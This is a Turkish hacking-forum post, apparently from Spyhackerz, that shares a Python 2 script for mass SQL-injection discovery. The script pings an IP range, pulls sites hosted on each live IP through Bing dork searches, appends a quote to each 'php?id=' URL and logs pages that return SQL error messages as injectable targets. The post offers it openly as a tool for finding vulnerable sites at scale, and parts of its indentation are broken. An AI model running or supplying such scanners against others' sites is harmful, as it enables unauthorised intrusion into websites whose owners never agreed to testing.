Neler yeni

Yerli Script // Mass SQL Resolver/ (1 Viewer)

Mesajlar
107
Credits
0

Dil ve Sürüm:

Python 2.x
V1.0




Coded by:

@El Behram @tokikolik

Range edilen ip aralığındaki makinelerin hostlarındaki tüm sitelerde sql taraması yaparz


Kod:
[HIDE]

# -*- coding: UTF-8 -*-
import urllib
import os
import re
from time import sleep
import socket
import subprocess
import sys

red = "\033[91m"
green = "\033[93m"
default = "\033[0m"
def iprange():

    print "IP Range Scanner"
    print " "
    ip = raw_input("enter 3 part of ip address = ")
    maxrange=input("range = ")
    int(maxrange)

    for i in range(maxrange):
        param = ip + "." + str(i)
        response = os.system("ping -c 1 -w 1 " + param)
        if response == 0:
            print "[+] Founded an alive ip"
            list_ip = open("ip.txt", 'a+')
            list_ip.write(param + '\n')
            list_ip.close()

        else:
            print "[-] Dead"



def sqlihunt(dork):
   
  dork= 'IP:'+dork+" php?id= "
  
  start=0
  end=200
  sleep(3)
  print "[info]Getting Websites From Bing ... "
  while start<=end :
    try:
      con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
     
      conf = open(con[0])
      readd=conf.read()
      find=re.findall('<h2><a href="(.*?)"',readd)
      start = start+10
      #return find 
    except IOError:
      print "[ERROR]network error "
      print "[Info]reconnecting "
      sleep(10)
      print "[Info]retrying "
    try :
      for i in range(len(find)):
                  rez=find[i]+"'"
                  tst = urllib.urlretrieve(rez)
                  tstf = open(tst[0])
                  tstdd= tstf.read()
                  tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
                  if(tstfind):
                    print "[SLQi] : "+ rez 
            file2 =open('sql.txt','a+')
                    file2.write(rez + '\n')
            file2.close()
                  else:
                    print "[No SQLi ] : " + rez
    except IOError:
      print "[ERROR]No result found"

x = """

|==================[Spyhackerz.org]====================|
 __  __               ___       ____                 _                
|  \/  | __ _ ___ ___|_ _|_ __ |  _ \ ___  ___  ___ | |_   _____ _ __ 
| |\/| |/ _` / __/ __|| || '_ \| |_) / _ \/ __|/ _ \| \ \ / / _ \ '__|
| |  | | (_| \__ \__ \| || |_) |  _ <  __/\__ \ (_) | |\ V /  __/ |   
|_|  |_|\__,_|___/___/___| .__/|_| \_\___||___/\___/|_| \_/ \___|_|   
                         |_|                                         
==================[Spyhackerz.org]====================|
           Coded by El Behram & Tokikolik                         """



print red + x
print red + " "
print "Mass Ip Resolver V2.0 is starting ... "
print " "
print " "
sleep(2)
while(True):
    print default + "-*-*-*-*- MENU -*-*-*-*-*"
    print "[1] Ip ranger"
    print "[2] Mass resolver"
    print "[3] Exit"
    print  default + " "



    funch = input("Select funch number :")


    if funch == 1:
        print "Ip ranger is starting.."
        print "enter as  ---->> ab.cde.xx"
        print " "
        print " "
        iprange()
        continue

    elif funch == 2:
        print "Mass sql tool is tarting ..."
        dosya = open("ip.txt","r")
        for satir in dosya:
               sqlihunt(satir.strip())
            print " ./done "
            continue
    elif funch ==3:
        print "exit"
        sys.exit()
    else:
        print "Error"


[/HIDE]
 

Bu konuyu görüntüleyen kullanıcılar